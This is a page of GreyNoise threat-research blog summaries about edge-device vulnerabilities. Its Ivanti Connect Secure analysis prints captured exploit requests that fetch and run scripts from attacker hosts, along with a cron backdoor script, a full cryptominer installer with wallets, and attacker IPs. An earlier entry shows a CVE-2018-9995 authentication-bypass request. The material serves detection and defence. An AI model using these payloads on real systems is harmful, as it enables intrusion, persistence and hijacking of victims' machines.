GreyNoise Research

In-depth analysis and trend reporting from the GreyNoise Research team. Includes detection engineering insights, reverse engineering work, and white papers that surface emerging threat trends based on our telemetry — helping defenders stay ahead of risks that are often overlooked or not yet widely known.

GreyNoise Uncovers Early Warning Signals for Emerging Vulnerabilities

It’s well known that the window between CVE disclosure and active exploitation has narrowed. But what happens before a CVE is even disclosed? 

In our latest research “Early Warning Signals: When Attacker Behavior Precedes New Vulnerabilities,” GreyNoise analyzed hundreds of spikes in malicious activity — scanning, brute forcing, exploit attempts, and more — targeting edge technologies. We discovered a consistent and actionable trend: in the vast majority of cases, these spikes were followed by the disclosure of a new CVE affecting the same technology within six weeks. 

This recurring behavior led us to ask: 

Could attacker activity offer defenders an early warning signal for vulnerabilities that don’t exist yet — but soon will? 

The Six-Week Critical Window

Across 216 spikes observed across our Global Observation Grid (GOG) since September 2024, we found: 

  • 80 percent of spikes were followed by a new CVE within six weeks.
  • 50 percent were followed by a CVE disclosure within three weeks. 
  • These patterns were exclusive to enterprise edge technologies like VPNs, firewalls, and remote access tools — the same kinds of systems increasingly targeted by advanced threat actors. 

Why This Matters

Exploit activity may be more than what it seems. Some spikes appear to reflect reconnaissance or exploit-based inventorying. Others may represent probing that ultimately results in new CVE discovery. Either way, defenders can take action. 

Blocking attacker infrastructure involved in these spikes may reduce the chances of being inventoried — and ultimately targeted — when a new CVE emerges. Just as importantly, these trends give CISOs and security leaders a credible reason to harden defenses, request additional resources, or prepare strategic responses based on observable signals — not just after a CVE drops, but weeks before. 

What’s Inside the Report

The full report includes: 

  • A breakdown of the vendors, products, and GreyNoise tags where these patterns were observed.
  • Analysis of attacker behavior leading up to CVE disclosure. 
  • The methodology used to identify spikes and establish spike-to-CVE relationships. 
  • Clear takeaways for analysts and CISOs on how to operationalize this intelligence. 

This research builds on our earlier work on resurgent vulnerabilities, offering a new lens for defenders to track vulnerability risk based on what attackers do — not just what’s been disclosed. 

Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.

Where are they now? Starring: Atlassian's Confluence CVE-2023-22527

Ever wonder what happens to vulnerabilities after they're forgotten? 

In a new blog from the GreyNoise Labs team, we look at CVE-2023-22527, an Atlassian Confluence vulnerability that was all over the news back in January/2024, then forgotten a week later. But even though the media has forgotten, attackers haven't!

The Labs team digs a little into who the attacker is and their techniques - killing other malware, deleting log files, and even using SSH keys to infect other hosts.

If you're interested in how attackers use old vulnerabilities and what they do once they're on a host, check it out

Hunting for Fortinet's CVE-2024-21762

Here at GreyNoise, we’re pretty lucky to see a lot of proof of concepts on the wire as they’re released, but sometimes we have to seek them out ourselves. When CVE-2024-21762, an out-of-bounds write vulnerability in Fortinet FortiOS and FortiProxy, was added to CISA’s Known Exploited Vulnerabilities (KEV) Catalog, it became one such case. With no writeup or proof of concept available, follow along as our researcher h0wdy goes down the rabbit hole to get enough information to develop a detection for our sensors. 

Check out the blog!

If you’re just looking for the tag, you can track Fortinet's CVE-2024-21762 here:

Anatomy of a GreyNoise Tag

Tags allow users to see the GreyNoise data from a non-IP-centric view. The difference between how we view tags from an IP-Centric perspective and a non-IP-Centric perspective can be seen in the differences between the visualizer’s Today and Tags view.

At the time of writing this, the Today view gives us a list of a list of 348,125 IPs, all seen within the last day. Each of these IPs contains different data points like the Source Countries, Destination Countries, ASN, and Top Tags. Approaching the data in this way shows IPs that contain tags. This lets users get a general overview of the characteristics 283,765 machines have shared over the past 24 hours. This is useful and fun information when trying to see the overarching landscape. However, when in need of a blocklist or alert about IPs that may be targeting a specific piece of software or hardware that your network contains, this is an instance where tags come in handy. This is because when looking at GreyNoise data from the visualizer’s Tags view, tags have IPs attributed to specific things that users may be interested in rather than just the IPs themselves. For example, if you’re using Cisco routers, you might go to the Tags view and just query Cisco, resulting in a list of tracked events related to Cisco devices.

The hope is that this design results in an experience more like Googling and less like writing an SQL query to find things that may interest users.

To reiterate, the technical goal of tags is to sort the data from outside the scope of the IP, and this is where GreyNoise classifications come into play. Classifications are split into Intent and Category. Intent is divided into Unknown, Malicious, and Benign, and Category is divided into Activity, Tool, Actor, Worm, and Search Engine. These sets are not limited to CVE based activity. They include behaviors, attribution, and unique traffic characteristics.  This is what the bulk of GreyNoise tags boils down to: either tracking “behaviors,” like in the case of Malicious Activity, and “attribution,” like in the case of a Benign Actor. What’s particularly interesting about these two examples is that there shouldn’t be any overlap between them. When there is, that indicates the potential need to rewrite a tag, which leads to the topic you’ve probably all been waiting for: how a tag gets written.

A Malicious Activity and Benign Actor tag work well as examples because of the difference in how they’re tracked. A Malicious Tag is heavily based on the contents of captured web packets (pcap). In contrast, a Benign Actor tag will ideally be based on an IP list, and when that can’t be gathered, a combination of rDNS and ASN will be used if these variables are consistent. This makes writing a Benign Actor tag the most straightforward, and typically most time intensive of the two.

Writing a Benign Actor starts with finding an actor. This is usually suggested by consistent rDNS with a word like bot, scanner, or crawl in its name. We can easily search this in the viz with metadata.rdns:crawl. This returns a lot of GoogleBot hits. Refine the search some more: metadata.rdns:crawl -actor:”GoogleBot” and we can see some crawlers and actors that have not been tagged yet.



That first unknown IP in the list has crawl-149-56-150-195.dataproviderbot.com as its rDNS. The next question is, have we seen other IPs with dataproviderbot, or something like it, as it’s rDNS, and if so, are they also benign? A search for metadata.rdns:*dataprovider* will work.



There is no malicious activity to speak of, so they seem benign. This can be verified by trying to find any information about the source. Following the rDNS trail is a good start. The initial crawl link times out, but the parent rDNS resolves to https://www.dataprovider.com/. They seem like a good candidate for a Benign Actor tag, but before reaching out, it’s always worth checking if a tag already exists, and to my surprise, it does: 


However, we don’t seem to be getting any hits for it. After reviewing the query we’re running on the backend, it looks like we’re tagging based on rDNS, but it’s not a match for what we’re seeing. They must have changed their crawler’s name! This is going to need some further investigation. A Google search for dataproviderbot leads to a page about their crawler specifically. Looks like they identify themselves with a User-Agent: 

The Dataprovider.com spider identifies itself with a user agent, which makes it visible in logs and site statistics programs you may use. Look for the following agent:"Mozilla/5.0 (compatible; Dataprovider.com)"

This won’t do because User-Agent’s can be easily spoofed. Fortunately, they have a contact link just for questions about the bot! At this point, I would usually just reach out to them, verify that the traffic we’re seeing is theirs, and ask if they can share their IP list. If they cannot share this, it does seem that we may have had enough information to write a tag for tracking them—the search for metadata.rdns:*dataprovider* done earlier had some promising results that I hadn’t mentioned.


This information and what we know about their User-Agent and rDNS could suffice.

When tagging this benign actor without an IP list, the primary points of interest are ASN, ORG, and rDNS. The only thing we might consider grabbing from the PCAP’s data field in this case would be the User-Agent. However, when tracking Malicious Activity, or Activity in general, we primarily focus on the data field of PCAP.

Here’s a scrubbed packet that matches a tag I wrote:

GET /device.rsp?opt=user&cmd=list HTTP/1.1
Host: 
Connection: close
Accept: */*Accept-Encoding: gzip, deflate
Connection: close
Cookie: uid=adminUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:22.0) Gecko/20130405 Firefox/22.0

What information can we gather from this? When discussing this event, we can translate it to: “This is an HTTP GET request requesting the device.rsp endpoint on the server. The GET request queries for opt=user&cmd=list and the contents of its Cookie is uid=admin.” Experience and a basic understanding of standard protocols are a considerable help when recognizing anomalies or notable features of a web packet. We can't all have experience, but a plain-text protocol like HTTP has plenty of resources to help us understand what’s going on in this packet. This basic understanding allows us to infer the request for /device.rsp?opt=user&cmd=list and the user=admin cookie are likely part of an authentication bypass, making them defining features of this packet. We can check this with a Google search for allintext:”/device.rsp?opt=user&cmd=list”. And what do you know!? The first hit is for CVE-2018-9995; the description of this vulnerability makes it pretty clear we’ve found our match!

allow remote attackers to bypass authentication via a "Cookie: uid=admin" header, as demonstrated by a device.rsp?opt=user&cmd=list request that provides credentials within JSON data in a response.

This is an excellent time to pause and point out that the intention of tags is not only to generate data regarding a vulnerability but also to aid in the proliferation of related knowledge. This is achieved through the tag’s description and providing resources found in the research process. Once we’ve added these, we can form a query to search GreyNoise for similar packets. This is one of the more nuanced aspects of writing tags. Finding the balance between making the signature general enough to catch variations of the same event but specific enough so there are no false positives. An accurate query to the internal GN data set for this event would look something like this:

select * from packets where data like 'GET /device.rsp~?opt=user&cmd=list%user=admin%' escape '~'

The query for this event is pretty straightforward, but in many cases, exploitation may work regardless of capitalization or order of request operands like opt and cmd. In these cases, the query has to be adjusted accordingly.

If you have any more questions about detection engineering and how we write tags here at GreyNoise, please feel free to reach out to me via email or socials: h0wdy@greynoise.io @h0wdy @h0wdy.bsky.social! Also! Please don’t hesitate to message me if you’re new to hacking! I’m also just starting my journey, and I am always down to connect and share knowledge with my fellow n00bs! <3 

Bluetooth Unleashed: Syncing Up with the RattaGATTa Series! Part 1

Are you ready to dive into the fascinating world of Bluetooth Low-Energy (BTLE) and its implications for privacy and security? GreyNoise Labs is thrilled to present the first installment of our series, "RattaGATTa: Scalable Bluetooth Low-Energy Survey." This blog post is not just a narrative—it's an adventure into the intricacies of BTLE, the challenges of hardware and radio frequency, and the importance of rate-limiting algorithms.

Join Remy as he recounts the journey from a simple act of kindness—using BTLE to locate a lost Fitbit—to the development of a sophisticated system capable of identifying and cataloging BTLE devices. Discover the complexities of the domain, the hurdles in measuring security impacts, and the tools that can provide quantitative and qualitative measures. This is a tale of technology, cybersecurity, and the quest for understanding a technology that surrounds us invisibly yet significantly.

In this series, he'll explore the depths of BTLE, from the basics of device identification to the nuances of connection protocols. He'll share insights on custom hardware design, iterative software development, and the real-world challenges that come with radio frequency communications. Whether you're a cybersecurity professional, a tech enthusiast, or simply curious about the wireless world around you, this series promises to enlighten and engage. Stay tuned for more as we unravel the mysteries of Bluetooth Low-Energy together.

Check out the first blog in this series here.

Practical Vulnerability Archaeology Starring Ivanti's CVE-2021-44529

While everybody has been talking about Ivanti vulnerabilities such as CVE-2024-21887 (remote code execution via path traversal - our tag) and CVE-2024-21893 (remote code execution via server-side request forgery - our tag), our labs' team ran into some online discussions about CVE-2021-44529. According to Ivanti's advisory, it's due to "code injection," but online sources claimed it's actually a backdoor. A mystery!   

In a brand new GreyNoise Labs Grimoire blog, Ron pulls out his archaeology tools and investigates what little evidence of this vulnerability remains. While most details have been flushed down the memory hole, tools like the Wayback Machine still have archives that we can explore.

Would you like to know more? Check out the blog!

The Confusing History of F5 BIG-IP RCE Vulnerabilities

In our latest Grimoire post, Ron dives into the confusing web of F5 BIG-IP vulnerabilities. It all started when he found an untagged shell-injection exploit in Sift that looked like—but wasn't—CVE-2021-22986 (a well-known SSRF bug); it was, however, discussed in many of the same write-ups as CVE-2021-22986. But if it's not the SSRF issue, what IS it? Ron works backward and identifies each of the recent F5 BIG-IP vulnerabilities as they're seen on our sensors and uses some advanced sleuthing skills—including talking to the folks who originally wrote about these issues—to track down the mysterious shell-injection vulnerability.

While investigating old F5 vulnerabilities, he found other interesting bits of history. For example, did you know that the CVE-2021-22986 patch fixed two similar (but different) vulnerabilities? And that neither was the shell injection? Or, did you know that there's an intended method for running Linux commands (as root!) against the F5 BIG-IP management port, which is commonly leveraged by authentication bypass issues? We even demonstrate using that built-in (mis?)-feature to escalate any local user to root.

If you want to know way too much about attacks against F5 BIG-IP devices, then this is the blog for you!

Tags referenced:

CVE-2021-22986 - Authentication Bypass via SSRF

CVE-2022-1388 - Auth Bypass via Header Smuggling

CVE-2021-23015 - Post-authentication RCE via Command Injection


CVE-2022-41800 - Post-authentication RCE via .rpmspec Injection

n/a - Post-authentication RCE via /mgmt/tm/util/bash

Ivanti Connect Secure Exploited to Install Cryptominers

One of my favorite things to do each morning is to look at the significant recent vulnerabilities that I found interesting - right now, my list is Ivanti Connect Secure, Atlassian Confluence, Apache Ofviz, SnakeYAML, etc., to check our honeypots to see if any new exploits have dropped since last time. And oh boy, was I rewarded this morning when I checked Ivanti! The overwhelming majority of what we see daily is scanners scanning honeypots and honeypots luring scanners - a security Ouroborus, if you will - but thanks to our new sensors, we have much more insight into what "real" attackers are trying. Let's see what turned up when I lifted the Ivanti rock this morning!

Note: I'm censoring IPs / users in the requests to defang them, but I included them at the bottom in case you want to block them.

Target

These payloads are all leveraging a pair of vulnerabilities in Ivanti Connect Secure - CVE-2023-46805 and CVE-2024-21887, written about here, and with a public exploit available. You can also see the exploitation picking up on our tag.

Payload 1

Here's the first payload that caught my eye:

GET /api/v1/totp/user-backup-code/../../license/keys-status/%3b%77%67%65%74%20%2d%2d%74%69%6d%65%6f%75%74%3d%32%30%20%2d%2d%6e%6f%2d%63%68%65%63%6b%2d%63%65%72%74%69%66%69%63%61%74%65%20%2d%71%20%2d%4f%2d%20%68%74%74%70%73%3a%2f%2f[ip]%2f%69%76%61%6e%74%69%2e%6a%73%7c%73%68%3b%0a HTTP/1.1
Host: [ip]
User-Agent: curl/7.81.0  
Accept: */*

Which decodes to:

api/v1/totp/user-backup-code/../../license/keys-status/;wget --timeout=20 --no-check-certificate -q -O- https://[ip]/ivanti.js|sh;\n"

As of writing, that file is live and installs a persistent backdoor using cron:

#!/bin/bash
url='https://[ip]/ivanti'
name1=`date +%s%N`
wget --no-check-certificate ${url} -O /etc/$name1
chmod +x /etc/$name1
echo "*/10 * * * * root /etc/$name1" >> /etc/cron.d/$name1
/etc/$name1

name2=`date +%s%N`
curl -k ${url} -o /etc/$name2
chmod +x /etc/$name2
echo "*/10 * * * * root /etc/$name2" >> /etc/cron.d/$name2
/etc/$name2

name3=`date +%s%N`
wget --no-check-certificate ${url} -O /tmp/$name3
chmod +x /tmp/$name3
(crontab -l ; echo "*/10 * * * * /tmp/$name3") | crontab -
/tmp/$name3

name4=`date +%s%N`
curl -k ${url} -o /var/tmp/$name4
chmod +x /var/tmp/$name4
(crontab -l ; echo "*/10 * * * * /var/tmp/$name4") | crontab -
/var/tmp/$name4

while true
do
	chmod +x /etc/$name1
	/etc/$name1
	sleep 60
	chmod +x /etc/$name2
	/etc/$name2
	sleep 60
	chmod +x /tmp/$name3
	/tmp/$name3
	sleep 60
	chmod +x /var/tmp/$name4
	/var/tmp/$name4
	sleep 60
done

Advice: Check for files that look like /etc/<long number>, /tmp/<long number>, or /var/tmp/<long number>, and check your crontab files for odd entries

The payload it fetches is a 64-bit executable:

$ file backdoor 
backdoor: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped

What does the backdoor do? Let's take the lazy approach - strings:

$ strings -n10 backdoor
[...lots and lots of junk...]
Usage: ispdd [OPTIONS]
  -o, --url=URL                 URL of mining server
  -a, --algo=ALGO               mining algorithm https://ispdd.com/docs/algorithms
      --coin=COIN               specify coin instead of algorithm
  -u, --user=USERNAME           username for mining server
  -p, --pass=PASSWORD           password for mining server
  -O, --userpass=U:P            username:password pair for mining server
  -x, --proxy=HOST:PORT         connect through a SOCKS5 proxy
  -k, --keepalive               send keepalived packet for prevent timeout (needs pool support)
[...]

Aha, a bitcoin miner!

Payload 2

Next up, this payload:

GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bwget%20https%3a%2f%2fraw%2egithubusercontent%2ecom%2fmomika233%2ftest%2fmain%2fm%2esh%20%26%26%20chmod%20%2bx%20m%2esh%20%26%26%20bash%20m%2esh HTTP/1.1  
Host: [ip]  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36  
Connection: close  
Accept-Encoding: gzip

Which decodes to:

/api/v1/totp/user-backup-code/../../license/keys-status/;wget https://raw.githubusercontent.com/[user]/test/main/m.sh && chmod +x m.sh && bash m.sh

Unsurprisingly, m.sh is a shell script:

#!/bin/bash
cd /tmp && wget https://github.com/[user]/test/raw/main/watchd0g && chmod +x watchd0g && ./watchd0g
cd /tmp && wget  https://github.com/[user]/test/raw/main/watchbog && chmod +x watchbog && ./watchbog

Kinda weirdly, the scripts are 64-bit and 32-bit executables:

$ file watch*
watchbog: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, no section header
watchd0g: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header

Both files are UPX-packed (what year is this?), which is fortunately quite easy to unpack:

$ dnf install upx

$ upx -d watchbog 
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2024
UPX 4.2.2       Markus Oberhumer, Laszlo Molnar & John Reiser    Jan 3rd 2024

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
  11911882 -   4454800   37.40%   linux/i386    watchbog

Unpacked 1 file.

$ upx -d watchd0g 
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2024
UPX 4.2.2       Markus Oberhumer, Laszlo Molnar & John Reiser    Jan 3rd 2024

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
  12519601 -   4741804   37.88%   linux/amd64   watchd0g

Unpacked 1 file.

Those files appear to be written in Go and somewhat obfuscated (or maybe Go always looks obfuscated?) - in any case, the strings command doesn't tell me much other than an SSH private key:

-----BEGIN PRIVATE KEY-----
MC4CAQAwBQYDK2VwBCIEIDWHqbKNp4h9inuerCayD7NO6glM9bnHjB+WcmT2Prfa
-----END PRIVATE KEY-----

Rather than spending a lot of time digging into this, I decided to move on to the next thing. Searching by checksum, it does appear that watchd0g is known malware

Advice: check for /tmp/watchd0g and /tmp/watchbog

Payload 3

And finally, the last payload:

GET /api/v1/totp/user-backup-code/../../license/keys-status/%3b(type%20curl%20&%3E/dev/null;%20curl%20-o%20/tmp/script.sh%20http://[ip]:8089/u/123/100123/202401/d9a10f4568b649acae7bc2fe51fb5a98.sh%20%7C%7C%20type%20wget%20&%3E/dev/null;%20wget%20-O%20/tmp/script.sh%20http://[ip]:8089/u/123/100123/202401/d9a10f4568b649acae7bc2fe51fb5a98.sh);%20chmod%20+x%20/tmp/script.sh;%20/tmp/script.sh HTTP/1.1  
Host: 128.199.174.6  
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36  
Connection: close  
Accept-Encoding: gzip

Which decodes to:

/api/v1/totp/user-backup-code/../../license/keys-status/;(type curl &>/dev/null; curl -o /tmp/script.sh http://[ip]:8089/u/123/100123/202401/d9a10f4568b649acae7bc2fe51fb5a98.sh || type wget &>/dev/null; wget -O /tmp/script.sh http://[ip]:8089/u/123/100123/202401/d9a10f4568b649acae7bc2fe51fb5a98.sh); chmod  x /tmp/script.sh; /tmp/script.sh

And the shellscript it fetches:

$ cat script.sh 
#!/bin/bash

WALLET=45yeuMC5LauAg18s7JPvpwNmPqDUrgZnhYwpQnbpo5PJKttK4GrjqS2jN1bemwMjrTc7QG414P6XgNZQGbhpwsnrKUsKSt5
EMAIL=$2
if [ -z $HOME ]; then
  HOME=/var/tmp/
fi


CPU_THREADS=$(nproc)
EXP_MONERO_HASHRATE=$(( CPU_THREADS * 700 / 1000))
if [ -z $EXP_MONERO_HASHRATE ]; then
  exit 1
fi

power2() {
  if ! type bc >/dev/null; then
    if   [ "$1" -gt "8192" ]; then
      echo "8192"
    elif [ "$1" -gt "4096" ]; then
      echo "4096"
    elif [ "$1" -gt "2048" ]; then
      echo "2048"
    elif [ "$1" -gt "1024" ]; then
      echo "1024"
    elif [ "$1" -gt "512" ]; then
      echo "512"
    elif [ "$1" -gt "256" ]; then
      echo "256"
    elif [ "$1" -gt "128" ]; then
      echo "128"
    elif [ "$1" -gt "64" ]; then
      echo "64"
    elif [ "$1" -gt "32" ]; then
      echo "32"
    elif [ "$1" -gt "16" ]; then
      echo "16"
    elif [ "$1" -gt "8" ]; then
      echo "8"
    elif [ "$1" -gt "4" ]; then
      echo "4"
    elif [ "$1" -gt "2" ]; then
      echo "2"
    else
      echo "1"
    fi
  else 
    echo "x=l($1)/l(2); scale=0; 2^((x+0.5)/1)" | bc -l;
  fi
}

PORT=$(( $EXP_MONERO_HASHRATE * 30 ))
PORT=$(( $PORT == 0 ? 1 : $PORT ))
PORT=`power2 $PORT`
PORT=$(( 10000 + $PORT ))
if [ -z $PORT ]; then
  echo "ERROR: Can't compute port"
  exit 1
fi

if [ "$PORT" -lt "10001" -o "$PORT" -gt "18192" ]; then
  echo "ERROR: Wrong computed port value: $PORT"
  exit 1
fi



if sudo -n true 2>/dev/null; then
  sudo systemctl stop .ssh_miner.service
fi
killall -9 xmrig

rm -rf $HOME/.ssh
[ -d $HOME/.ssh ] || mkdir $HOME/.ssh
if ! curl  "http://[ip]:8089/u/123/100123/202401/sshd" -o $HOME/.ssh/sshd; then
  if ! wget "http://[ip]:8089/u/123/100123/202401/sshd" -O $HOME/.ssh/sshd; then
    echo "ERROR: Can't download sshd"
    exit 1
  fi
fi

if ! curl  "http://[ip]:8089/u/123/100123/202401/31a5f4ceae1e45e1a3cd30f5d7604d89.json" -o $HOME/.ssh/config.json; then
  if ! wget "http://[ip]:8089/u/123/100123/202401/31a5f4ceae1e45e1a3cd30f5d7604d89.json" -o $HOME/.ssh/config.json; then
    echo "ERROR: Can't download config"
    exit 1
  fi
fi

chmod +x $HOME/.ssh/sshd


PASS=`hostname | cut -f1 -d"." | sed -r 's/[^a-zA-Z0-9\-]+/_/g'`
if [ "$PASS" == "localhost" ]; then
  PASS=`ip route get 1 | awk '{print $NF;exit}'`
fi
if [ -z $PASS ]; then
  PASS=na
fi
if [ ! -z $EMAIL ]; then
  PASS="$PASS:$EMAIL"
fi


sed -i 's/"user": *"[^"]*",/"user": "'$WALLET'",/' $HOME/.ssh/config.json
sed -i 's/"pass": *"[^"]*",/"pass": "'$PASS'",/' $HOME/.ssh/config.json
sed -i 's#"log-file": *null,#"log-file": "'$HOME/.ssh/sshd.log'",#' $HOME/.ssh/config.json
sed -i 's/"syslog": *[^,]*,/"syslog": true,/' $HOME/.ssh/config.json

cp $HOME/.ssh/config.json $HOME/.ssh/config_background.json
sed -i 's/"background": *false,/"background": true,/' $HOME/.ssh/config_background.json

cat >$HOME/.ssh/miner.sh </dev/null; then
  nice $HOME/.ssh/sshd \$*
else
  echo "Monero miner is already running in the background. Refusing to run another one."
  echo "Run \"killall xmrig\" or \"sudo killall xmrig\" if you want to remove background miner first."
fi
EOL

chmod +x $HOME/.ssh/miner.sh

# 创建计划任务

if ! sudo -n true 2>/dev/null; then
  if ! grep .ssh/miner.sh $HOME/.profile >/dev/null; then
    echo "[*] Adding $HOME/.ssh/miner.sh script to $HOME/.profile"
    echo "$HOME/.ssh/miner.sh --config=$HOME/.ssh/config_background.json >/dev/null 2>&1" >>$HOME/.profile
  else 
    echo "Looks like $HOME/.ssh/miner.sh script is already in the $HOME/.profile"
  fi
  echo "[*] Running miner in the background (see logs in $HOME/.ssh/sshd.log file)"
  /bin/bash $HOME/.ssh/miner.sh --config=$HOME/.ssh/config_background.json >/dev/null 2>&1
else

  if [[ $(grep MemTotal /proc/meminfo | awk '{print $2}') > 3500000 ]]; then
    echo "[*] Enabling huge pages"
    echo "vm.nr_hugepages=$((1168+$(nproc)))" | sudo tee -a /etc/sysctl.conf
    sudo sysctl -w vm.nr_hugepages=$((1168+$(nproc)))
  fi

  if ! type systemctl >/dev/null; then

    echo "[*] Running miner in the background (see logs in $HOME/.ssh/sshd.log file)"
    /bin/bash $HOME/.ssh/miner.sh --config=$HOME/.ssh/config_background.json >/dev/null 2>&1
    echo "ERROR: This script requires \"systemctl\" systemd utility to work correctly."
    echo "Please move to a more modern Linux distribution or setup miner activation after reboot yourself if possible."

  else

    echo "[*] Creating .ssh_miner systemd service"
    cat >/tmp/.ssh_miner.service </dev/null
    sudo systemctl daemon-reload
    sudo systemctl enable .ssh_miner.service
    sudo systemctl start .ssh_miner.service
  fi
fi

That appears to install an ssh server, install a .json configuration file, and set up a systemd service, as well as a backdoor in the user's .profile file. Here's the configuration file:

{
    "api": {
        "id": null,
        "worker-id": null
    },
    "http": {
        "enabled": false,
        "host": "127.0.0.1",
        "port": 0,
        "access-token": null,
        "restricted": true
    },
    "autosave": true,
    "background": false,
    "colors": true,
    "title": true,
    "randomx": {
        "init": -1,
        "init-avx2": 0,
        "mode": "auto",
        "1gb-pages": false,
        "rdmsr": true,
        "wrmsr": true,
        "cache_qos": false,
        "numa": true,
        "scratchpad_prefetch_mode": 1
    },
    "cpu": {
        "enabled": true,
        "huge-pages": true,
        "huge-pages-jit": false,
        "hw-aes": null,
        "priority": null,
        "memory-pool": true,
        "yield": true,
        "max-threads-hint": 40,
        "asm": true,
        "argon2-impl": null,
        "astrobwt-max-size": 550,
        "astrobwt-avx2": false,
        "cn/0": false,
        "cn-lite/0": false
    },
    "opencl": {
        "enabled": false,
        "cache": true,
        "loader": null,
        "platform": "AMD",
        "adl": true,
        "cn/0": false,
        "cn-lite/0": false,
        "panthera": false
    },
    "cuda": {
        "enabled": false,
        "loader": null,
        "nvml": true,
        "cn/0": false,
        "cn-lite/0": false,
        "panthera": false,
        "astrobwt": false
    },
    "donate-level": 1,
    "donate-over-proxy": 1,
    "log-file": null,
    "pools": [
        {
            "algo": null,
            "coin": null,
            "url": "auto.c3pool.org:19999",
            "user": "45yeuMC5LauAg18s7JPvpwNmPqDUrgZnhYwpQnbpo5PJKttK4GrjqS2jN1bemwMjrTc7QG414P6XgNZQGbhpwsnrKUsKSt5",
            "pass": "default",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "enabled": true,
            "tls": false,
            "tls-fingerprint": null,
            "daemon": false,
            "socks5": null,
            "self-select": null,
            "submit-to-origin": false
        },
        {
            "algo": null,
            "coin": null,
            "url": "auto.c3pool.org:19999",
            "user": "43uAMN5SYT45ZQqeNS6jkW5ssKjm7N4bmLT5uL49bvxGJnsPywn2zPhQA8nHc9XTGXavrstGj3pFy4geh3dV2x9uM8TfwzJ",
            "pass": "default",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "enabled": true,
            "tls": false,
            "tls-fingerprint": null,
            "daemon": false,
            "socks5": null,
            "self-select": null,
            "submit-to-origin": false
        }
    ],
    "print-time": 60,
    "health-print-time": 60,
    "dmi": true,
    "retries": 5,
    "retry-pause": 5,
    "syslog": false,
    "tls": {
        "enabled": false,
        "protocols": null,
        "cert": null,
        "cert_key": null,
        "ciphers": null,
        "ciphersuites": null,
        "dhparam": null
    },
    "user-agent": null,
    "verbose": 0,
    "watch": true,
    "rebench-algo": false,
    "bench-algo-time": 20,
    "pause-on-battery": false,
    "pause-on-active": false

Advice: Check for a systemd service called .ssh_miner, a .profile entry that rusn a miner, or a file called /tmp/script.sh

IoCs

Here are the SHA256 sums of all the files I saw:

  • 0c9ada54a8a928a747d29d4132565c4ccecca0a02abe8675914a70e82c5918d2  backdoor
  • bbfba00485901f859cf532925e83a2540adfe01556886837d8648cd92519c68d  ivanti.js
  • cf20940907be484440e8343aa05505ad2e4d6d1f24ef29504bfa54ade4a8455f  m.sh
  • 8eadb5beeb21d4a95dacd133cb2b934342fcb39fe4df2a8387a0d5499c72450d  watchbog
  • 1e1e94bd2bfd5054265123bf55c4cf6ce87de6692d9329bda4a37e89272356e4  watchd0g
  • 45c9578bbceb2ce2b0f10133d2f3f708e78c8b7eb3c52ad69d686e822f9aa65f  config.json
  • 4cba272d83f6ff353eb05e117a1057699200a996d483ca56fa189e9eaa6bb56c  script.sh

And some file paths:

  • /etc/<long number>
  • /etc/cron.d/<long number>
  • /tmp/<long number>
  • /var/tmp/<long number>
  • m.sh
  • /tmp/watchd0g
  • /tmp/watchbog
  • /tmp/script.sh
  • $HOME/.ssh/config.json
  • $HOME/.ssh/sshd
  • $HOME/.ssh/config_background.json

And the IP addresses / users I observed:

  • 45.130.22.219
  • https[:]//raw.githubusercontent.com/momika233
  • 192.252.183.116

We recommend organizations block IPs that have recently exploited Ivanti. We have published a Gist containing these IPs.

CVE-2022-1471: SnakeYAML Deserialization Deep Dive

SnakeYAML has slithered its way into a deserialization vulnerability, with versions before 2.0 allowing remote code execution when used to parse untrusted input. In this GreyNoise Labs post, Lead Security Researcher Ron Bowes digs into the technical details, drama, and exploits around CVE-2022-1471.  

By default, SnakeYAML allows the instantiation of arbitrary Java classes from untrusted YAML sources. This "insecure by default" design has led to at least eight different vulnerabilities prior to its official designation as a CVE. We'll highlight the unhelpful responses from developers and the importance of secure defaults.

Additionally, we'll demonstrate how to build a vulnerable app and understand how the deserialization actually works, developing an exploit to demonstrate how to achieve remote code execution.

C'mon down for an in-depth look at this critical YAML vulnerability!

Mining The Undiscovered Country With GreyNoise EAP Sensors: F5 BIG-IP Edition

Over at the GreyNoise Labs Grimoire, Ron Bowes has a new, deep-dive post out on the creation of a simple clone of the F5 BIG-IP management port to attract traffic and analyze it. Ron deployed the honeypot for a couple of weeks and then analyzed the traffic using tshark

Some interesting findings include:

  • Brute-force attacks on the login page with basic credentials like “user123” and “password123”.
  • Attempts to exploit CVE-2021-22986, an SSRF issue in the authentication parser.
  • Traffic targeting the “/mgmt/tm/util/bash” endpoint, which is typically targeted for auth-bypass issues like CVE-2022-1388.
  • Two instances of exploitation attempts targeting the “/mgmt/shared/iapp/rpm-spec-creator endpoint”, which is related to CVE-2022-41800, an authenticated remote code execution vulnerability.

Ron does note that the majority of the traffic is not related to a rumored 0-day exploit, and that the honeypot helped provide insights into various attack attempts and vulnerabilities.

Pour out your fav caffeinated beverage and sink into Ron's insightful post!

A Day In The Life Of A GreyNoise Researcher: The Path To Understanding The Remote Code Execution Vulnerability Apache (CVE-2023-50164) in Apache Struts2

Over on the GreyNoise Labs Grimoire, Matthew Remacle (Remy) digs into the newly disclosed Apache Struts2 CVE-2023-50164 file upload vulnerability. This weakness allows an attacker to drop a web shell that can be called remotely through a public interface over defined routes.

Keep an eye on our new tag for CVE-2023-40164.

Remy's analysis highlights the following key points:
  • Apache Struts2 is an open-source Java web application development framework used in various enterprise-grade applications and business use cases.
  • The vulnerability occurs when a multipart form request is used, and the constraints for path normalization are bypassed.
  • The attacker can inject a web shell (e.g., shell.jsp) into the file system, which can then be remotely called.
